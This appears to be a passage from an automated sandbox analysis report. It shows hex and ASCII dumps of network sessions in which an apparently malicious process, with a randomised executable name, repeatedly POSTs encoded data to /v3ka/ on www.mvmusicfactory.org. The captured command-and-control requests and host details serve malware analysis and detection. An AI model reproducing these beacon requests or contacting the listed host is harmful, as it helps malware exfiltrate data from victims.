                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;
                                                                                    Mar 18, 2024 15:10:11.035245895 CET1286INData Raw: 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69
                                                                                    Data Ascii: color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relativ
                                                                                    Mar 18, 2024 15:10:11.035351038 CET1286INData Raw: 33 33 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74
                                                                                    Data Ascii: 33;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or i
                                                                                    Mar 18, 2024 15:10:11.035399914 CET1286INData Raw: 73 70 3b 49 49 53 20 57 65 62 20 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52
                                                                                    Data Ascii: sp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070
                                                                                    Mar 18, 2024 15:10:11.035413980 CET180INData Raw: 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 4c 69 6e 6b 49 44 3d 36 32 32 39 33 26 61 6d 70 3b 49 49 53 37 30 45 72 72 6f 72 3d 34 30 34 2c 30 2c 30 78 38 30 30 37 30 30 30 32 2c
                                                                                    Data Ascii: ef="https://go.microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    25192.168.11.304983691.195.240.19806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:10:16.329777002 CET742OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.mvmusicfactory.org
                                                                                    Origin: http://www.mvmusicfactory.org
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 205
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.mvmusicfactory.org/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 68 74 70 65 5a 6c 51 35 56 2f 6b 73 36 41 49 2b 36 64 6c 67 79 4a 61 42 62 52 4d 4d 74 77 49 53 6d 73 62 51 68 53 69 54 34 6e 77 78 4b 36 69 48 6e 74 42 4e 6f 62 48 56 6f 4e 69 6b 42 64 4a 4f 6e 39 58 45 6a 54 5a 2b 31 53 50 45 4a 78 56 39 45 62 79 67 46 6c 76 54 4b 39 37 36 6a 54 38 63 64 61 61 59 6c 32 50 4c 45 72 6b 51 66 71 6e 4c 2b 70 6a 73 67 76 6b 2f 6e 6e 64 78 51 55 50 4e 46 35 2b 78 52 34 38 4b 58 35 6d 30 38 56 4c 63 43 69 39 4c 75 74 75 71 44 6e 76 39 34 69 57 6b 45 74 72 75 55 79 74 2b 4d 54 55 66 56 79 75 76 59 56 71 58 6b 38 57 51 6e 6e 46 79 61 71 32 54 4e 77 3d 3d
                                                                                    Data Ascii: c4qx7JIP=htpeZlQ5V/ks6AI+6dlgyJaBbRMMtwISmsbQhSiT4nwxK6iHntBNobHVoNikBdJOn9XEjTZ+1SPEJxV9EbygFlvTK976jT8cdaaYl2PLErkQfqnL+pjsgvk/nndxQUPNF5+xR48KX5m08VLcCi9LutuqDnv94iWkEtruUyt+MTUfVyuvYVqXk8WQnnFyaq2TNw==
                                                                                    Mar 18, 2024 15:10:16.512376070 CET299INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 18 Mar 2024 14:10:16 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 154
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    26192.168.11.304983791.195.240.19806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:10:19.031209946 CET762OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.mvmusicfactory.org
                                                                                    Origin: http://www.mvmusicfactory.org
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 225
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.mvmusicfactory.org/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 68 74 70 65 5a 6c 51 35 56 2f 6b 73 6f 51 34 2b 35 36 5a 67 31 70 61 47 55 78 4d 4d 6a 51 49 65 6d 74 6e 51 68 51 4f 44 35 53 59 78 4c 66 65 48 6d 76 70 4e 72 62 48 56 6d 74 6a 76 50 39 4a 48 6e 39 62 69 6a 58 64 2b 31 53 62 45 4a 31 5a 39 45 49 71 68 46 31 76 72 43 64 37 38 6e 54 38 63 64 61 61 59 6c 79 75 73 45 72 73 51 63 61 58 4c 2f 4c 4c 6a 74 50 6b 77 69 58 64 78 47 55 4f 47 46 35 2f 57 52 36 4a 43 58 2f 69 30 38 52 44 63 43 77 56 4b 31 64 75 77 4e 48 75 73 32 53 33 42 4f 76 2f 74 45 46 4a 46 56 79 73 63 55 6c 66 31 46 57 65 56 33 63 71 39 37 6d 6f 61 59 6f 33 49 51 34 69 71 34 41 76 41 34 75 50 79 50 64 42 43 77 6c 2f 44 48 37 34 3d
                                                                                    Data Ascii: c4qx7JIP=htpeZlQ5V/ksoQ4+56Zg1paGUxMMjQIemtnQhQOD5SYxLfeHmvpNrbHVmtjvP9JHn9bijXd+1SbEJ1Z9EIqhF1vrCd78nT8cdaaYlyusErsQcaXL/LLjtPkwiXdxGUOGF5/WR6JCX/i08RDcCwVK1duwNHus2S3BOv/tEFJFVyscUlf1FWeV3cq97moaYo3IQ4iq4AvA4uPyPdBCwl/DH74=
                                                                                    Mar 18, 2024 15:10:19.213391066 CET299INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 18 Mar 2024 14:10:19 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 154
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    27192.168.11.304983891.195.240.19806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:10:21.734164000 CET1679OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.mvmusicfactory.org
                                                                                    Origin: http://www.mvmusicfactory.org
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 1141
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.mvmusicfactory.org/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 68 74 70 65 5a 6c 51 35 56 2f 6b 73 6f 51 34 2b 35 36 5a 67 31 70 61 47 55 78 4d 4d 6a 51 49 65 6d 74 6e 51 68 51 4f 44 35 55 41 78 4b 74 6d 48 6d 4f 70 4e 71 62 48 56 75 4e 69 6f 50 39 49 48 6e 2b 72 75 6a 53 46 55 31 52 6a 45 50 67 46 39 51 74 47 68 57 56 76 72 4f 39 37 39 6a 54 38 4e 64 61 71 63 6c 32 4b 73 45 72 73 51 63 59 50 4c 35 5a 6a 6a 76 50 6b 2f 6e 6e 64 39 51 55 50 68 46 39 53 70 52 36 63 67 57 50 43 30 38 77 2f 63 41 44 39 4b 6f 74 75 75 4b 48 75 30 32 53 37 53 4f 70 61 65 45 46 56 6a 56 77 4d 63 55 68 66 72 64 7a 2b 64 74 39 53 6a 32 32 73 65 50 70 69 64 65 71 75 46 35 54 2b 34 2f 73 43 66 58 4a 64 49 68 6e 6e 70 55 2b 76 61 45 5a 42 4b 58 4a 43 32 76 63 68 64 6e 70 6b 38 2f 4e 56 66 30 4c 55 6b 37 56 36 46 6b 6f 64 6d 31 4b 35 34 2f 71 4b 45 54 71 61 65 75 58 41 55 57 58 6e 2f 48 79 49 70 32 70 41 64 38 51 42 69 4c 39 46 54 38 33 51 7a 4e 44 4b 73 65 4a 74 56 41 57 55 55 70 65 72 4f 52 45 43 38 33 79 4e 42 7a 54 65 72 48 36 6b 5a 30 6d 35 62 63 4b 53 30 4b 52 42 54 68 59 35 56 2b 79 45 38 44 78 6f 7a 78 4a 59 51 33 64 36 39 57 34 73 41 68 49 47 6c 36 49 43 71 59 43 63 51 2b 37 52 34 54 4a 69 4f 43 33 64 51 73 75 2b 72 75 50 6d 6d 39 67 52 52 39 33 2b 6d 74 46 37 6a 4b 37 63 6c 4e 44 70 30 34 75 6c 56 6f 37 56 4f 44 67 6a 74 35 42 42 6b 6c 56 72 6e 4a 4b 76 6e 56 4f 30 72 36 6c 4d 55 43 6a 64 70 46 5a 6f 4c 37 31 43 64 51 78 2b 59 74 71 66 37 53 2b 31 58 2b 33 41 4b 65 32 33 56 57 75 2f 37 42 6d 67 56 51 6e 46 46 61 79 47 73 5a 6d 64 55 50 56 48 63 32 66 30 57 4c 71 79 6e 56 4c 4e 6c 47 4b 69 79 70 34 50 6b 59 4a 4a 44 35 6d 62 70 6f 36 6e 57 53 6b 46 36 4e 33 6c 6a 37 4d 50 44 54 45 32 6d 6c 58 54 7a 43 67 46 6d 67 6a 37 47 4f 57 4c 58 5a 33 56 71 67 30 4f 49 6f 42 50 65 44 54 68 45 67 38 73 42 72 46 63 71 62 54 33 31 77 43 54 65 76 77 71 4f 59 64 2f 77 76 35 43 57 36 32 4e 4d 63 67 44 6d 79 41 32 78 69 4a 72 6b 33 4a 7a 76 74 65 78 67 75 33 4e 32 55 6d 7a 57 4b 6a 61 71 5a 33 65 77 32 39 73 2b 51 73 48 35 7a 62 39 6b 4c 46 34 69 43 79 69 66 6d 37 2b 6b 33 36 78 71 67 6d 49 2b 57 73 70 35 59 61 2b 67 6b 4b 75 4f 7a 64 33 71 70 39 64 6c 61 77 65 6c 61 4a 52 68 47 6d 78 58 39 70 33 45 31 34 4d 4f 55 71 45 69 74 4f 61 37 6e 4e 49 31 56 6c 49 61 69 35 4a 76 46 6e 39 6a 6a 42 4f 65 49 55 55 79 61 34 4a 77 69 79 7a 52 2b 77 72 63 75 48 74 6e 39 61 5a 39 52 45 51 61 76 52 36 71 37 56 54 73 65 53 69 5a 59 6a 74 68 36 6d 74 41 31 38 33 43 64 53 46 4a 75 2f 44 76 63 4d 34 69 73 2b 37 30 45 38 50 74 4b 72 69 59 69 63 50 6f 2b 35 52 30 4b 34 5a 35 74 44 57 49 4c 76 62 4e 69 6b 6c 4d 6b 6f 62 4c 35 45 2b 66 75 2b 64 52 4e 72 58 41 64 44 32 6a 7a 79 30 55 47 36 4e 50 77 6a 64 76 79 5a 7a 6e 6b 79 58 79 5a 51 65 55 55 31 4e 41 33 6a 74 4e 43 4c 41 65 2f 51 6a 72 58 49 50 58 30 34 5a 42 32 77 71 36 35 61 33 70 4b 71 54 75 4c 30 61 48 65 49 70 4e 61 41 56 77 54 69 4c 79 30 4f 43 70 58 36 4f 35 76 48 65 42 47 75 2b 49 6d 36 65 66 75 61 75 35 6a 67 56 57 55 63 49 72 38 72 74 62 6f 71 4a 51 6d 74 62 48 55 2b 78 5a 45 65 47 43 7a 48 6d 78 47 69 61 51 56 4e 34 36 35 52 66 39 44 64 59 34 65 74 2f 69 53 37 6e 42 77 78 59 69 56 47 37 43 38 32 65 7a 38 4e 7a 45 4a 58 62 2f 52 2f 6a 66 38 6a 54 77 4c 2b 55 6e 4d 36 4b 47 69 48 34 74 75 6c 72 6a 46 4e 48 53 79 42 35 2b 37 6a 56 48 56 77 6f 78 66 31 6f 65 4c 4d 53 4d 70 45 6d 6e 79 65 50 6d 6a 5a 2f 63 7a 43 70 62 6b 4f 52 45 54 33 78 54 79 64 49 2b 66 52 4b 4d 59 50 68 41 4e 6a 37 55 41 59 52 44
                                                                                    Data Ascii: c4qx7JIP=htpeZlQ5V/ksoQ4+56Zg1paGUxMMjQIemtnQhQOD5UAxKtmHmOpNqbHVuNioP9IHn+rujSFU1RjEPgF9QtGhWVvrO979jT8Ndaqcl2KsErsQcYPL5ZjjvPk/nnd9QUPhF9SpR6cgWPC08w/cAD9KotuuKHu02S7SOpaeEFVjVwMcUhfrdz+dt9Sj22sePpidequF5T+4/sCfXJdIhnnpU+vaEZBKXJC2vchdnpk8/NVf0LUk7V6Fkodm1K54/qKETqaeuXAUWXn/HyIp2pAd8QBiL9FT83QzNDKseJtVAWUUperOREC83yNBzTerH6kZ0m5bcKS0KRBThY5V+yE8DxozxJYQ3d69W4sAhIGl6ICqYCcQ+7R4TJiOC3dQsu+ruPmm9gRR93+mtF7jK7clNDp04ulVo7VODgjt5BBklVrnJKvnVO0r6lMUCjdpFZoL71CdQx+Ytqf7S+1X+3AKe23VWu/7BmgVQnFFayGsZmdUPVHc2f0WLqynVLNlGKiyp4PkYJJD5mbpo6nWSkF6N3lj7MPDTE2mlXTzCgFmgj7GOWLXZ3Vqg0OIoBPeDThEg8sBrFcqbT31wCTevwqOYd/wv5CW62NMcgDmyA2xiJrk3Jzvtexgu3N2UmzWKjaqZ3ew29s+QsH5zb9kLF4iCyifm7+k36xqgmI+Wsp5Ya+gkKuOzd3qp9dlawelaJRhGmxX9p3E14MOUqEitOa7nNI1VlIai5JvFn9jjBOeIUUya4JwiyzR+wrcuHtn9aZ9REQavR6q7VTseSiZYjth6mtA183CdSFJu/DvcM4is+70E8PtKriYicPo+5R0K4Z5tDWILvbNiklMkobL5E+fu+dRNrXAdD2jzy0UG6NPwjdvyZznkyXyZQeUU1NA3jtNCLAe/QjrXIPX04ZB2wq65a3pKqTuL0aHeIpNaAVwTiLy0OCpX6O5vHeBGu+Im6efuau5jgVWUcIr8rtboqJQmtbHU+xZEeGCzHmxGiaQVN465Rf9DdY4et/iS7nBwxYiVG7C82ez8NzEJXb/R/jf8jTwL+UnM6KGiH4tulrjFNHSyB5+7jVHVwoxf1oeLMSMpEmnyePmjZ/czCpbkORET3xTydI+fRKMYPhANj7UAYRD
                                                                                    Mar 18, 2024 15:10:21.917275906 CET299INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 18 Mar 2024 14:10:21 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 154
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    28192.168.11.304983991.195.240.19806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:10:24.436081886 CET464OUTGET /v3ka/?c4qx7JIP=svB+aVl3D/Qs3yYm3uEZx4nnJil+hT1lh9v7sh/m91IvNeiskalMkbjGhLmhKb4ZrcP91hx+1jPTfxZ9U4bWGVnRMNWmuwE3Nqa36DGpX5UBaKLpwaX6qds=&K4W=bb2HuFjPIN HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.mvmusicfactory.org
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:10:24.653352976 CET1286INHTTP/1.1 200 OK
                                                                                    date: Mon, 18 Mar 2024 14:10:24 GMT
                                                                                    content-type: text/html; charset=UTF-8
                                                                                    transfer-encoding: chunked
                                                                                    vary: Accept-Encoding
                                                                                    x-powered-by: PHP/8.1.17
                                                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                    pragma: no-cache
                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_ElQkokIyThrk3pYerPB6MjAnPczDOy8Z3TT02PZqKru+pgu5kt8h9x6gRDWTFkcsx9hYFG+7N+fGmHea5Z4vcw==
                                                                                    last-modified: Mon, 18 Mar 2024 14:10:24 GMT
                                                                                    x-cache-miss-from: parking-5747c769c4-wlt8g
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 45 6c 51 6b 6f 6b 49 79 54 68 72 6b 33 70 59 65 72 50 42 36 4d 6a 41 6e 50 63 7a 44 4f 79 38 5a 33 54 54 30 32 50 5a 71 4b 72 75 2b 70 67 75 35 6b 74 38 68 39 78 36 67 52 44 57 54 46 6b 63 73 78 39 68 59 46 47 2b 37 4e 2b 66 47 6d 48 65 61 35 5a 34 76 63 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 